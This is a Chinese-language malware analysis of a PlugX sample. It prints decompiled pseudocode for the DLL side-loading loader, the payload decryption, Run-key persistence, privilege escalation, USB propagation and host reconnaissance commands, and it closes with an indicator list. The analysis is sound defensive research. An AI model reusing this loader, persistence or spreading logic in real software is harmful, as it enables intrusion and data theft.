PlugX样本分析
本片文章对PlugX某样本行为进行分析。
样本信息
样本的基本信息
type |
hash |
SHA256: |
00fbfaf36114d3ff9e2c43885341f1c02fade82b49d1cf451bc756d992c84b06 |
MD5: |
c1c9624b21f71e4565b941a37db3815a |
SHA1: |
1c251974b2e6f110d96af5b23ad036954ba15e4e |
解压样本发现样本文件夹内有三个文件,分别是AvastSvc.exe、wsc.dll、AvastAuth.dat。下面对文件逐个进行分析。
AvastSvc.exe
这是一个白文件,程序只有一个start函数,内容是导入wsc.dll,执行其run()函数。
void __noreturn start()
{
HMODULE v0; // eax@1
HMODULE v1; // esi@1
FARPROC v2; // edi@2
LPWSTR v3; // eax@3
DWORD v4; // edi@3
v0 = LoadLibraryW(L"wsc.dll");
v1 = v0;
if ( v0 )
{
v2 = GetProcAddress(v0, "_run@4");
if ( v2 )
{
v3 = GetCommandLineW();
v4 = ((int (__stdcall *)(_DWORD))v2)(v3);
FreeLibrary(v1);
}
else
{
v4 = GetLastError();
FreeLibrary(v1);
}
}
else
{
v4 = GetLastError();
}
ExitProcess(v4);
}
可以看到样本为了躲避检测采取了白+黑的方式进行,这也是许多恶意软件用来躲避检测的常见方式。
wsc.dll
先对dll文件进行静态分析
int sub_10001BF0()
{
HMODULE v0; // eax@1
FARPROC v1; // eax@1
unsigned int i; // [sp+0h] [bp-1ACh]@5
char v4; // [sp+Bh] [bp-1A1h]@1
char v5; // [sp+Bh] [bp-1A1h]@3
char v6; // [sp+Bh] [bp-1A1h]@5
CHAR String2; // [sp+Ch] [bp-1A0h]@3
char v8; // [sp+Dh] [bp-19Fh]@3
int v9; // [sp+4Ch] [bp-160h]@3
_BYTE *v10; // [sp+50h] [bp-15Ch]@3
CHAR String1; // [sp+54h] [bp-158h]@1
char v12; // [sp+55h] [bp-157h]@1
int v13; // [sp+15Ch] [bp-50h]@3
unsigned int v14; // [sp+160h] [bp-4Ch]@5
char v15; // [sp+164h] [bp-48h]@1
char v16; // [sp+165h] [bp-47h]@1
char v17; // [sp+166h] [bp-46h]@1
char v18; // [sp+167h] [bp-45h]@1
char v19; // [sp+168h] [bp-44h]@1
char v20; // [sp+169h] [bp-43h]@1
char v21; // [sp+16Ah] [bp-42h]@1
char v22; // [sp+16Bh] [bp-41h]@1
char v23; // [sp+16Ch] [bp-40h]@1
char v24; // [sp+16Dh] [bp-3Fh]@1
char v25; // [sp+16Eh] [bp-3Eh]@1
CHAR ModuleName; // [sp+170h] [bp-3Ch]@1
char v27; // [sp+171h] [bp-3Bh]@1
char v28; // [sp+172h] [bp-3Ah]@1
char v29; // [sp+173h] [bp-39h]@1
char v30; // [sp+174h] [bp-38h]@1
char v31; // [sp+175h] [bp-37h]@1
char v32; // [sp+176h] [bp-36h]@1
char v33; // [sp+177h] [bp-35h]@1
char v34; // [sp+178h] [bp-34h]@1
char v35; // [sp+17Ch] [bp-30h]@3
int v36; // [sp+17Dh] [bp-2Fh]@3
int v37; // [sp+184h] [bp-28h]@5
int v38; // [sp+188h] [bp-24h]@1
int v39; // [sp+18Ch] [bp-20h]@3
CHAR ProcName; // [sp+190h] [bp-1Ch]@1
char v41; // [sp+191h] [bp-1Bh]@1
char v42; // [sp+192h] [bp-1Ah]@1
char v43; // [sp+193h] [bp-19h]@1
char v44; // [sp+194h] [bp-18h]@1
char v45; // [sp+195h] [bp-17h]@1
char v46; // [sp+196h] [bp-16h]@1
char v47; // [sp+197h] [bp-15h]@1
char v48; // [sp+198h] [bp-14h]@1
char v49; // [sp+199h] [bp-13h]@1
char v50; // [sp+19Ah] [bp-12h]@1
char v51; // [sp+19Bh] [bp-11h]@1
char v52; // [sp+19Ch] [bp-10h]@1
char v53; // [sp+19Dh] [bp-Fh]@1
char v54; // [sp+19Eh] [bp-Eh]@1
char v55; // [sp+19Fh] [bp-Dh]@1
char v56; // [sp+1A0h] [bp-Ch]@1
char v57; // [sp+1A1h] [bp-Bh]@1
char v58; // [sp+1A2h] [bp-Ah]@1
_BYTE *v59; // [sp+1A8h] [bp-4h]@1
v15 = '\\';
v16 = 'A';
v17 = 'v';
v18 = 'a';
v19 = 's';
v20 = 't';
v21 = 'A';
v22 = 'u';
v23 = 't';
v24 = 'h';
v25 = '\0';
String1 = '\0';
sub_10002680(&v12, 0, 0x103u);
ModuleName = 'k';
v27 = 'e';
v28 = 'r';
v29 = 'n';
v30 = 'e';
v31 = 'l';
v32 = '3';
v33 = '2';
v34 = '\0';
v38 = 9;
ProcName = 'G';
v41 = 'e';
v42 = 't';
v43 = 'M';
v44 = 'o';
v45 = 'd';
v46 = 'u';
v47 = 'l';
v48 = 'e';
v49 = 'F';
v50 = 'i';
v51 = 'l';
v52 = 'e';
v53 = 'N';
v54 = 'a';
v55 = 'm';
v56 = 'e';
v57 = 'A';
v58 = '\0';
v0 = GetModuleHandleA(&ModuleName);
v1 = GetProcAddress(v0, &ProcName);
(v1)(0, &String1, 260);
v59 = sub_10002660(&String1, '\\'); // 指向路径
v4 = -8;
if ( v59 )
{
*v59 = 0;
v4 = -113;
}
v35 = '.';
v36 = 'tad';
v38 = 5;
String2 = 0;
sub_10002680(&v8, 0, 0x3Fu);
v9 = sub_10002D40(&v15);
sub_10002C10(&String2, &v15, v9);
sub_10002AD0(&String2, &v35, 4u); // AvastAuth.dat
lstrcatA(&String1, &String2);
v10 = 0;
v39 = 0;
v13 = 0;
sub_10001000(&String1, &v39, &v13); // 打开文件并对文件进行读操作
v5 = (((((((-38 * ((-26 * (((v4 ^ 0xE5 | 0xF5) ^ 0x4C) >> 4) | 0xCE) + 76) - 34) & 0x6D) - 19) / 39 >> 6) & 0xC9) + 60) ^ 0xCF)
/ 171
/ 101
/ 178
/ 146
- 14;
if ( !v13 )
{
sub_10002A4D(0);
v5 &= 0x7Bu;
}
v37 = v39;
v14 = sub_10002D40(v39);
v13 = v13 - v14 - 1;
v39 += v14 + 1;
v10 = LocalAlloc(0x40u, v13 + 1);
v6 = (((4 * ((((v5 + 19) ^ 0xC4) >> 5) | 0xBA) & 0x34) - 61) >> 6) & 0xCD;// 自解密算法
for ( i = 0; i < v13; ++i )
{
v10[i] = *(i + v39);
v10[i] ^= *(v37 + i % v14);
v6 = (v6 ^ 0x3A) / 137;
}
return sub_100015D0(v10, v13); // 获得读写权限
}
函数sub_10001000对.dat文件进行读操作,读取的值作为中间值进行了自解密运算,保存到v10中,最后获取读写操作权限。
下面我们进行动态分析在v10下断点找到shellcode进行提取。这个时候eax保存的值就是shellcode生成的地址,edx存储的是shellcode的长度。二进制复制到010editor上保存文件可以得到shellcode
shellcode
下面对生成的dll行为进行分析,先找到入口函数DllMain(),比较容易的找到关键函数。
int DllMain()
{
int v0; // eax
int v2; // [esp+0h] [ebp-18h]
void *v3; // [esp+4h] [ebp-14h]
int v4; // [esp+8h] [ebp-10h]
void *v5; // [esp+Ch] [ebp-Ch]
int v6; // [esp+10h] [ebp-8h]
int v7; // [esp+14h] [ebp-4h] BYREF
unknown_libname_2();
v7 = 0;
v0 = exec_GetCommandLineW(); // 当前进程命令行字符串
v6 = exec_CommandLineToArgvW(v0, &v7);
switch ( v7 )
{
case 1:
run_self(); // 创建三个文件,并设置文件夹自启动
exec_ExitProcess(0);
break;
case 2:
v5 = sub_1000C3E0();
v4 = exec_CreateMutexW(0, 0, v5); // 创建互斥体
if ( exec_GetLastError() == 0xB7 )
exec_ExitProcess(0);
if ( !exec_memcmp(*(v6 + 4), L"-net", 8) )// 第四个参数是-net执行下面操作
{
Reg_Network(); // Control/Network写入注册表值
run_self(); // 创建三个文件,并设置文件夹自启动
exec_ExitProcess(0);
}
sub_100153A0(); // 提权、删除文件、获取计算机基本信息
sub_100019B0(0); // 套接字相关函数,相关注册表值
exec_CloseHandle(v4);
break;
case 3:
sub_10015400(*(v6 + 4));
v3 = sub_1000C3E0();
v2 = exec_CreateMutexW(0, 0, v3); // 创建互斥体
if ( exec_GetLastError() != 0xB7 )
{
exec_CloseHandle(v2);
run_self();
}
exec_ExitProcess(0);
break;
}
unknown_libname_1();
return 0;
}
函数经过分析后采取了比较易读的命名方式。下面对关键函数进行依次分析。
在上面的代码中,这个程序要获取当前进程的命令行字符串,使用switch来进行流程的执行。
v7 = 1时执行case 1操作
case1
run_self()函数
int sub_100090E0()
{
unsigned int v0; // eax
int len; // eax
int len_0; // eax
char v4[520]; // [esp+0h] [ebp-1D68h] BYREF
wchar_t Ext; // [esp+208h] [ebp-1B60h] BYREF
char v6[510]; // [esp+20Ah] [ebp-1B5Eh] BYREF
char v7[520]; // [esp+408h] [ebp-1960h] BYREF
wchar_t Filename; // [esp+610h] [ebp-1758h] BYREF
char v9[510]; // [esp+612h] [ebp-1756h] BYREF
WCHAR v10; // [esp+810h] [ebp-1558h] BYREF
char v11[518]; // [esp+812h] [ebp-1556h] BYREF
WCHAR v12; // [esp+A18h] [ebp-1350h] BYREF
char v13[518]; // [esp+A1Ah] [ebp-134Eh] BYREF
char v14[520]; // [esp+C20h] [ebp-1148h] BYREF
char v15[520]; // [esp+E28h] [ebp-F40h] BYREF
wchar_t Dir; // [esp+1030h] [ebp-D38h] BYREF
char v17[510]; // [esp+1032h] [ebp-D36h] BYREF
wchar_t FullPath; // [esp+1230h] [ebp-B38h] BYREF
char v19[518]; // [esp+1232h] [ebp-B36h] BYREF
WCHAR v20[260]; // [esp+1438h] [ebp-930h] BYREF
WCHAR v21; // [esp+1640h] [ebp-728h] BYREF
char v22[518]; // [esp+1642h] [ebp-726h] BYREF
char ppath[520]; // [esp+1848h] [ebp-520h] BYREF
_WORD v24[260]; // [esp+1A50h] [ebp-318h] BYREF
int v25[12]; // [esp+1C58h] [ebp-110h] BYREF
__int16 v26; // [esp+1C88h] [ebp-E0h]
HANDLE hObject; // [esp+1C9Ch] [ebp-CCh] BYREF
HANDLE v28; // [esp+1CA0h] [ebp-C8h]
__int16 v29[46]; // [esp+1CACh] [ebp-BCh] BYREF
__int16 v30[20]; // [esp+1D08h] [ebp-60h] BYREF
__int16 v31[16]; // [esp+1D30h] [ebp-38h] BYREF
WCHAR v32; // [esp+1D50h] [ebp-18h] BYREF
int v33; // [esp+1D52h] [ebp-16h]
__int16 v34; // [esp+1D56h] [ebp-12h]
wchar_t Drive; // [esp+1D58h] [ebp-10h] BYREF
int v36; // [esp+1D5Ah] [ebp-Eh]
int v37; // [esp+1D60h] [ebp-8h]
int pName; // [esp+1D64h] [ebp-4h]
v31[0] = '%'; // %userprofile%\\
v31[1] = 'u';
v31[2] = 's';
v31[3] = 'e';
v31[4] = 'r';
v31[5] = 'p';
v31[6] = 'r';
v31[7] = 'o';
v31[8] = 'f';
v31[9] = 'i';
v31[10] = 'l';
v31[11] = 'e';
v31[12] = '%';
v31[13] = '\\';
v31[14] = '\0';
v30[0] = '%';
v30[1] = 'a'; // %allusersprofile%\\
v30[2] = 'l'; // C:\程序数据
v30[3] = 'l';
v30[4] = 'u';
v30[5] = 's';
v30[6] = 'e';
v30[7] = 'r';
v30[8] = 's';
v30[9] = 'p';
v30[10] = 'r';
v30[11] = 'o';
v30[12] = 'f';
v30[13] = 'i';
v30[14] = 'l';
v30[15] = 'e';
v30[16] = '%';
v30[17] = '\\';
v30[18] = '\0';
exec_lstrcpyW(v14, v31);
exec_lstrcpyW(v15, v30);
pName = sub_1000C320();
exec_lstrcatW(v14, pName);
exec_lstrcatW(v15, pName);
exec_lstrcatW(v14, L"\\");
exec_lstrcatW(v15, L"\\");
exec_ExpandEnvironmentStringsW(v15, v24, 520);
if ( exec_GetFileAttributesW(v24) == -1 && !exec_CreateDirectoryW(v24, 0) )// 创建目录
exec_ExpandEnvironmentStringsW(v14, v24, 520);
exec_lstrcpyW(ppath, v24);
exec_lstrcatW(ppath, L"AvastSvc.exe");
exec_lstrcpyW(v7, v24);
exec_lstrcatW(v7, L"wsc.dll");
exec_lstrcpyW(v4, v24);
exec_lstrcatW(v4, L"AvastAuth.dat");
Drive = 0;
v36 = 0;
Dir = 0;
memset(v17, 0, sizeof(v17));
Filename = 0;
memset(v9, 0, sizeof(v9));
Ext = 0;
memset(v6, 0, sizeof(v6));
v21 = 0;
memset(v22, 0, sizeof(v22));
FullPath = 0;
memset(v19, 0, sizeof(v19));
v10 = 0;
memset(v11, 0, sizeof(v11));
v12 = 0;
memset(v13, 0, sizeof(v13));
exec_GetModuleFileNameW(0, &FullPath, 520);
_wsplitpath_s(&FullPath, &Drive, 3u, &Dir, 0x100u, &Filename, 0x100u, &Ext, 0x100u);
wsprintfW(&v21, L"%s%s", &Drive, &Dir);
wsprintfW(&v10, L"%s%s", &v21, L"wsc.dll");
wsprintfW(&v12, L"%s%s", &v21, L"AvastAuth.dat");
sub_10007380(v24);
exec_SetFileAttributesW(v24, 2);
exec_SetFileAttributesW(v24, 2);
exec_CopyFileW(&FullPath, ppath, 0); // 创建文件AvastSvc.exe、wsc.dll、AvastAuth.dat
exec_CopyFileW(&v10, v7, 0);
exec_CopyFileW(&v12, v4, 0);
v0 = exec_GetSystemTimeAsFileTime(0); // 检索当前日期和时间
srand(v0);
v37 = rand() % 899 + 100;
wsprintfW(v20, L"\"%s\" %d", ppath, v37);
v29[0] = 'S';
v29[1] = 'o';
v29[2] = 'f';
v29[3] = 't';
v29[4] = 'w';
v29[5] = 'a';
v29[6] = 'r';
v29[7] = 'e';
v29[8] = '\\';
v29[9] = 'M';
v29[10] = 'i';
v29[11] = 'c';
v29[12] = 'r';
v29[13] = 'o';
v29[14] = 's';
v29[15] = 'o';
v29[16] = 'f';
v29[17] = 't';
v29[18] = '\\';
v29[19] = 'W';
v29[20] = 'i';
v29[21] = 'n';
v29[22] = 'd';
v29[23] = 'o';
v29[24] = 'w';
v29[25] = 's';
v29[26] = '\\';
v29[27] = 'C';
v29[28] = 'u';
v29[29] = 'r';
v29[30] = 'r';
v29[31] = 'e';
v29[32] = 'n';
v29[33] = 't';
v29[34] = 'V';
v29[35] = 'e';
v29[36] = 'r';
v29[37] = 's';
v29[38] = 'i';
v29[39] = 'o';
v29[40] = 'n';
v29[41] = '\\';
v29[42] = 'R';
v29[43] = 'u';
v29[44] = 'n';
v29[45] = '\0';
len = exec_lstrlenW(v20);
exec_RegCreate_SetKeyExW(0x80000002, v29, pName, v20, 2 * len + 2, 1);// HKEY_CURRENT_USER 0x80000001/打开注册表项并为文件创建键值(自启动)
len_0 = exec_lstrlenW(v20);
exec_RegCreate_SetKeyExW(0x80000001, v29, pName, v20, 2 * len_0 + 2, 1);// HKEY_LOCAL_MACHINE 0x80000002
v32 = 0;
v33 = 0;
v34 = 0;
wsprintfW(&v32, L" %d", v37);
exec_lstrcatW(ppath, &v32); // 拼接路径
exec_memset(&hObject, 0, '\x10');
exec_memset(v25, 0, 0x44);
v25[0] = 0x44;
v25[11] = '\x01';
v26 = 1;
if ( exec_CreateProcessW(0, ppath, 0, 0, 0, 4, 0, 0, v25, &hObject) )// 为AvastSvc.exe创建进程
{
exec_ResumeThread(v28);
CloseHandle(hObject);
CloseHandle(v28);
}
return 0;
}
这段代码先指向C:\程序数据,创建一个文件夹,然后将三个程序wsc.dll、AvastSvc.exe、AvastAuth.dat复制到文件夹内。后对文件夹内的三个文件设置注册表的HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \Windows \ CurrentVersion \ Run键值进行自启动设置,最后创建AvastSvc.exe进程。
执行case2操作流程:先创建一个互斥体,拿命令行第四个参数与“-net”字符串进行比较,不相同则执行Reg_Network()函数。而Reg_Network()函数功能是将注册表HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \Control \ Network\Version置1,后面同样执行run_self(),再往后执行sub_100153A0()函数。
case2
sub_100153A0()
int sub_100153A0()
{
int v1; // [esp+0h] [ebp-8h] BYREF
int v2; // [esp+4h] [ebp-4h]
sub_10015600(); // 遍历进程,打开进程设置自启动
v1 = 0;
v2 = exec_CreateThread(0, 0, sub_10014E10, 0, 0, &v1);// 创建线程
if ( v2 )
{
exec_CloseHandle(v2);
v2 = 0;
}
return 0;
}
其中sub_10015600()函数如下
sub_10015600()
int sub_10015600()
{
wchar_t v1[18]; // [esp+8h] [ebp-E4h] BYREF
wchar_t v2[16]; // [esp+2Ch] [ebp-C0h] BYREF
wchar_t v3[16]; // [esp+4Ch] [ebp-A0h] BYREF
wchar_t SubStr[16]; // [esp+6Ch] [ebp-80h] BYREF
wchar_t v5[16]; // [esp+8Ch] [ebp-60h] BYREF
wchar_t v6[14]; // [esp+ACh] [ebp-40h] BYREF
__int16 v7[18]; // [esp+C8h] [ebp-24h] BYREF
SubStr[0] = 'A'; // AdobeHelper.exe
SubStr[1] = 'd';
SubStr[2] = 'o';
SubStr[3] = 'b';
SubStr[4] = 'e';
SubStr[5] = 'H';
SubStr[6] = 'e';
SubStr[7] = 'l';
SubStr[8] = 'p';
SubStr[9] = 'e';
SubStr[10] = 'r';
SubStr[11] = '.';
SubStr[12] = 'e';
SubStr[13] = 'x';
SubStr[14] = 'e';
SubStr[15] = '\0';
v1[0] = 'A'; // AdobeUpdates.exe
v1[1] = 'd';
v1[2] = 'o';
v1[3] = 'b';
v1[4] = 'e';
v1[5] = 'U';
v1[6] = 'p';
v1[7] = 'd';
v1[8] = 'a';
v1[9] = 't';
v1[10] = 'e';
v1[11] = 's';
v1[12] = '.';
v1[13] = 'e';
v1[14] = 'x';
v1[15] = 'e';
v1[16] = '\0';
v2[0] = 'A';
v2[1] = 'd';
v2[2] = 'o';
v2[3] = 'b';
v2[4] = 'e';
v2[5] = 'U';
v2[6] = 'p';
v2[7] = 'd';
v2[8] = 'a';
v2[9] = 't';
v2[10] = 'e';
v2[11] = '.';
v2[12] = 'e';
v2[13] = 'x';
v2[14] = 'e';
v2[15] = '\0';
v6[0] = 'A';
v6[1] = 'd';
v6[2] = 'o';
v6[3] = 'b';
v6[4] = 'e';
v6[5] = 'A';
v6[6] = 'R';
v6[7] = 'M';
v6[8] = '.';
v6[9] = 'e';
v6[10] = 'x';
v6[11] = 'e';
v6[12] = '\0';
v5[0] = 'A';
v5[1] = 'A';
v5[2] = 'M';
v5[3] = ' ';
v5[4] = 'U';
v5[5] = 'p';
v5[6] = 'd';
v5[7] = 'a';
v5[8] = 't';
v5[9] = 'e';
v5[10] = '.';
v5[11] = 'e';
v5[12] = 'x';
v5[13] = 'e';
v5[14] = '\0';
v3[0] = 'A';
v3[1] = 'A';
v3[2] = 'M';
v3[3] = ' ';
v3[4] = 'U';
v3[5] = 'p';
v3[6] = 'd';
v3[7] = 'a';
v3[8] = 't';
v3[9] = 'e';
v3[10] = 's';
v3[11] = '.';
v3[12] = 'e';
v3[13] = 'x';
v3[14] = 'e';
v3[15] = '\0';
v7[0] = 'S'; // SeDebugprivilege
v7[1] = 'e';
v7[2] = 'D';
v7[3] = 'e';
v7[4] = 'b';
v7[5] = 'u';
v7[6] = 'g';
v7[7] = 'P';
v7[8] = 'r';
v7[9] = 'i';
v7[10] = 'v';
v7[11] = 'i';
v7[12] = 'l';
v7[13] = 'e';
v7[14] = 'g';
v7[15] = 'e';
v7[16] = 0;
sub_100072B0(v7, 1); // 指定写相关的访问权的OpenProcess操作
sub_100133D0(SubStr); // 遍历进程找到AdobeHelper.exe,关闭进程。打开进程删除注册表项
sub_100133D0(v1); // AdobeUpdates.exe
sub_100133D0(v2);
sub_100133D0(v6);
sub_100133D0(v5);
sub_100133D0(v3);
return sub_100072B0(v7, 0);
}
函数将AdobeHelper.exe、AdobeUpdates.exe、 AdobeUpdate.exe、AdobeARM.exe、AM Update.exe、AAM Updates.exe字符串传入sub_100133D0()函数,sub_100072B0()的功能是获得文件的写访问权。而sub_100133D0()的内容是关闭进程、遍历磁盘删除文件、删除启动项。
回到sub_100153A0()函数,后面创建了一个线程,为函数sub_10014E10()
sub_10014E10()
void __stdcall sub_10014E10(int a1)
{
int v1; // eax
__int16 lpBuffer; // [esp+0h] [ebp-430h] BYREF
char v3[518]; // [esp+2h] [ebp-42Eh] BYREF
wchar_t pFilePath; // [esp+208h] [ebp-228h] BYREF
char v5[518]; // [esp+20Ah] [ebp-226h] BYREF
int v6; // [esp+410h] [ebp-20h]
int v7; // [esp+414h] [ebp-1Ch] BYREF
int v8; // [esp+418h] [ebp-18h] BYREF
wchar_t *v9; // [esp+41Ch] [ebp-14h]
int v10; // [esp+420h] [ebp-10h]
int v11; // [esp+424h] [ebp-Ch]
int v12; // [esp+428h] [ebp-8h]
__int16 *v13; // [esp+42Ch] [ebp-4h]
exec_SetErrorMode(1);
v10 = 0;
lpBuffer = 0;
memset(v3, 0, sizeof(v3));
pFilePath = 0;
memset(v5, 0, sizeof(v5));
v13 = 0;
while ( 1 )
{
exec_memset(&lpBuffer, 0, 8);
exec_GetLogicalDriveStringsW(520, &lpBuffer);// 用指定系统中有效驱动器的字符串填充缓冲区。
v13 = &lpBuffer;
v6 = 1;
while ( *v13 ) // 驱动中的每个文件夹都复制自身
{
exec_memset(&pFilePath, 0, 8);
exec_lstrcpyW(&pFilePath, L"\\\\.\\"); // 匹配所有驱动器文件
exec_lstrcatW(&pFilePath, v13); // 所有驱动器
v9 = exec_wcsrchr(&pFilePath, '\\');
*v9 = 0;
v10 = CreateFile_0(&pFilePath); // 创建文件
if ( v10 == 1 )
{
v8 = 0;
v7 = 0;
v12 = exec_CreateThread(0, 0, sub_100151E0, &pFilePath, 0, &v8);// 创建线程 互斥体、超级隐藏文件
if ( v12 )
{
exec_CloseHandle(v12);
v12 = 0;
}
exec_Sleep(100);
v11 = exec_CreateThread(0, 0, sub_10015030, &pFilePath, 0, &v7);// 创建线程
if ( v11 )
{
exec_CloseHandle(v11);
v11 = 0;
}
exec_Sleep(1000);
}
v1 = exec_lstrlenW(v13);
v13 += v1 + 1;
}
exec_Sleep(30000);
}
}
函数创建了两个线程,在创建线程之前函数对整个磁盘进行遍历,并打开磁盘,之后在打开的磁盘中创建两个线程sub_100151E0()与sub_10015030()
sub_100151E0()
int __stdcall sub_100151E0(_WORD *a1)
{
WCHAR v2; // [esp+0h] [ebp-430h] BYREF
char v3[518]; // [esp+2h] [ebp-42Eh] BYREF
wchar_t SysId; // [esp+208h] [ebp-228h] BYREF
char v5[518]; // [esp+20Ah] [ebp-226h] BYREF
int v6; // [esp+410h] [ebp-20h]
wchar_t *v7; // [esp+414h] [ebp-1Ch]
int v8; // [esp+418h] [ebp-18h] BYREF
WCHAR pFileName; // [esp+41Ch] [ebp-14h] BYREF
int v10; // [esp+41Eh] [ebp-12h]
int v11; // [esp+422h] [ebp-Eh]
__int16 v12; // [esp+426h] [ebp-Ah]
_WORD *v13; // [esp+428h] [ebp-8h]
int v14; // [esp+42Ch] [ebp-4h]
exec_SetErrorMode(1);
v13 = a1;
pFileName = 0;
v10 = 0;
v11 = 0;
v12 = 0;
if ( *a1 == '\\' && v13[1] == '\\' )
wsprintfW(&pFileName, L"%c:\\", v13[4]);
else
wsprintfW(&pFileName, L"%ws", v13);
v2 = 0;
memset(v3, 0, sizeof(v3));
SysId = 0;
memset(v5, 0, sizeof(v5));
exec_lstrcpyW(&SysId, &pFileName);
v7 = exec_wcsrchr(&SysId, ':');
*v7 = 0;
wsprintfW(&v2, L"USB_NOTIFY_INF_%ws", &SysId);
v14 = exec_CreateMutexW(0, 0, &v2); // 为驱动创建互斥体
if ( exec_GetLastError() != 0xB7 )
{
v8 = 0;
v6 = exec_CreateThread(0, 0, sub_10013ED0, 0, 0, &v8);// 创建线程,设置隐藏文件注册表项
while ( sub_10015E00(&pFileName) != 2 ) // 查看网络连接。在驱动器中复制自身,并且创建伪装快捷方式文件.lnk 在回收站创建CEFHelper.exe文件
exec_Sleep(60000);
}
exec_ReleaseMutex(v14);
exec_CloseHandle(v14);
return 0;
}
函数进入每个驱动器之后创建互斥体USB_NOTIFY_INF_然后创建线程,设置隐藏注册表项。在while内部的sub_10015E00()函数查看网络连接、在驱动器中复制自身,并且创建伪装快捷方式文件.lnk 在回收站创建CEFHelper.exe文件,最后释放互斥体。
sub_10015030()
int __stdcall sub_10015030(_WORD *a1)
{
LPCWSTR v2; // [esp+0h] [ebp-428h] BYREF
DWORD v3; // [esp+4h] [ebp-424h]
DWORD v4; // [esp+8h] [ebp-420h]
wchar_t SysId; // [esp+208h] [ebp-220h] BYREF
char v6[518]; // [esp+20Ah] [ebp-21Eh] BYREF
wchar_t *v7; // [esp+410h] [ebp-18h]
WCHAR pFilePath; // [esp+414h] [ebp-14h] BYREF
int v9; // [esp+416h] [ebp-12h]
int v10; // [esp+41Ah] [ebp-Eh]
__int16 v11; // [esp+41Eh] [ebp-Ah]
_WORD *v12; // [esp+420h] [ebp-8h]
int v13; // [esp+424h] [ebp-4h]
exec_SetErrorMode(1);
v12 = a1;
pFilePath = 0;
v9 = 0;
v10 = 0;
v11 = 0;
if ( *a1 == '\\' && v12[1] == '\\' )
wsprintfW(&pFilePath, L"%c:\\", v12[4]);
else
wsprintfW(&pFilePath, L"%ws", v12);
LOWORD(v2) = 0;
memset(&v2 + 2, 0, 0x206u);
SysId = 0;
memset(v6, 0, sizeof(v6));
exec_lstrcpyW(&SysId, &pFilePath);
v7 = exec_wcsrchr(&SysId, ':');
*v7 = 0;
wsprintfW(&v2, L"USB_NOTIFY_COP_%ws", &SysId);// 为驱动创建互斥锁
v13 = exec_CreateMutexW(0, 0, &v2);
if ( exec_GetLastError() == 0xB7 )
{
exec_ReleaseMutex(v13);
exec_CloseHandle(v13);
v13 = 0;
return 0;
}
if ( InternetCheckConnectionW_0(v2, v3, v4) ) // 检查网络连接https://www.microsoft.com
{
sub_10010600(&pFilePath); // 将指定文件base64加密传到垃圾桶
}
else
{
if ( !sub_10012E60() ) // 设置Network注册表
return 0;
sub_10010BA0(&pFilePath); // 设置清空回收站注册表项,创建一个进程使用某些shell获取计算机的基本信息
sub_100123C0(&pFilePath);
}
exec_ReleaseMutex(v13);
exec_CloseHandle(v13);
return 0;
}
同上,创建一个互斥锁,检查网络连接https://www.microsoft.com ,连接正常则将某些指定格式的文件进行base64加密并传入回收站中。后面设置Network的注册表为1,sub_10010BA0()函数设置清空回收站注册表项,创建一个进程使用某些shell获取计算机的基本信息(ipconfig /all netstat -ano arp -a tasklist /v systeminfo)并且将文件tc3lzLmluZm8放入回收站将tmp.bat删除,并且创建进程。
回到主函数,sub_100019B0是套接字相关函数,如下
int __stdcall sub_100019B0(int a1)
{
__int16 v2[18]; // [esp+0h] [ebp-64h] BYREF
__int16 v3[16]; // [esp+24h] [ebp-40h] BYREF
int v4; // [esp+44h] [ebp-20h]
int v5; // [esp+48h] [ebp-1Ch]
int v6; // [esp+4Ch] [ebp-18h]
int v7; // [esp+50h] [ebp-14h]
int v8; // [esp+54h] [ebp-10h]
int v9; // [esp+58h] [ebp-Ch]
int v10; // [esp+5Ch] [ebp-8h]
char v11[4]; // [esp+60h] [ebp-4h] BYREF
sub_1000F960();
v2[0] = 'S';
v2[1] = 'e';
v2[2] = 'D';
v2[3] = 'e';
v2[4] = 'b';
v2[5] = 'u';
v2[6] = 'g';
v2[7] = 'P';
v2[8] = 'r';
v2[9] = 'i';
v2[10] = 'v';
v2[11] = 'i';
v2[12] = 'l';
v2[13] = 'e';
v2[14] = 'g';
v2[15] = 'e';
v2[16] = 0;
v10 = sub_100072B0(v2, 1); // 提权
v3[0] = 'S'; // SeTcbprivilege
v3[1] = 'e';
v3[2] = 'T';
v3[3] = 'c';
v3[4] = 'b';
v3[5] = 'P';
v3[6] = 'r';
v3[7] = 'i';
v3[8] = 'v';
v3[9] = 'i';
v3[10] = 'l';
v3[11] = 'e';
v3[12] = 'g';
v3[13] = 'e';
v3[14] = 0;
v9 = sub_100072B0(v3, 1); // 提权
v8 = sub_10009AE0(); // 创建线程,设置注册表值,创建套接字
unknown_libname_3(v11);
v7 = sub_100164D0(v11); // 窗口
v6 = sub_100165A0(v11); // 消息
v5 = sub_100164A0(v11); // Destroy
sub_10001850(dword_10028CEC);
sub_1000A210();
sub_1000EE80(); // WSACleanup
v4 = 0;
unknown_libname_4(v11);
return v4;
}
函数先提升权限,后创建一个线程创建一个套接字实现连接操作,可以执行远程用户的命令来篡改受感染的计算机,之后创建一个注册表Software\CLASSES\ms-pu\PROXY。
执行case3如下
case3
实现发送消息、执行shell的open操作。并且执行run_self操作。
总结
样本的行为事件总结如下:
注册表项
-
AvastSvcPYT = "% ProgramData% \ AvastSvcPYT \ AvastSvc.exe" : HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \Windows \ CurrentVersion \ Run
-
AvastSvcPYT = "% ProgramData% \ AvastSvcPYT \ AvastSvc.exe" : HKEY_CURRENT_USER \ Software \ Microsoft \Windows \ CurrentVersion \ Run
-
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Control \ Network Version = 1
-
HKEY_CURRENT_USER \ System \ CurrentControlSet \ Control \ Network Version = 1
-
HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \ ms-pu CLSID = {645FF040-5081-101B-9F08-00AA002F954E}
互斥体
-
USB_NOTIFYCOP
-
USB_NOTIFYINF
创建文件/目录
-
% ProgramData% \ AvastSvcPYT
-
% ProgramData% \ AvastSvcPYT \ AvastSvc.exe
-
% ProgramData% \ AvastSvcPYT \ AvastAuth.dat
-
% ProgramData% \ AvastSvcPYT \ wsc.dll
删除的文件
- 它会删除在终止进程的文件夹中找到的所有文件。(未定位)
- 它删除终止进程的文件夹。(未定位)
- 它将以下文件放入 {Drive} \RECYCLER.BIN:
- tmp.bat
- c3lzLmluZm8
- CEFHelper.exe
- AvastAuth.dat
- wsc.dll
创建进程
- % ProgramData% \ AvastSvcPYT \ AvastSvc.exe
关闭进程
- AdobeHelper.exe
- AdobeUpdates.exe
- AdobeUpdate.exe
- AdobeARM.exe
- AAM Update.exe
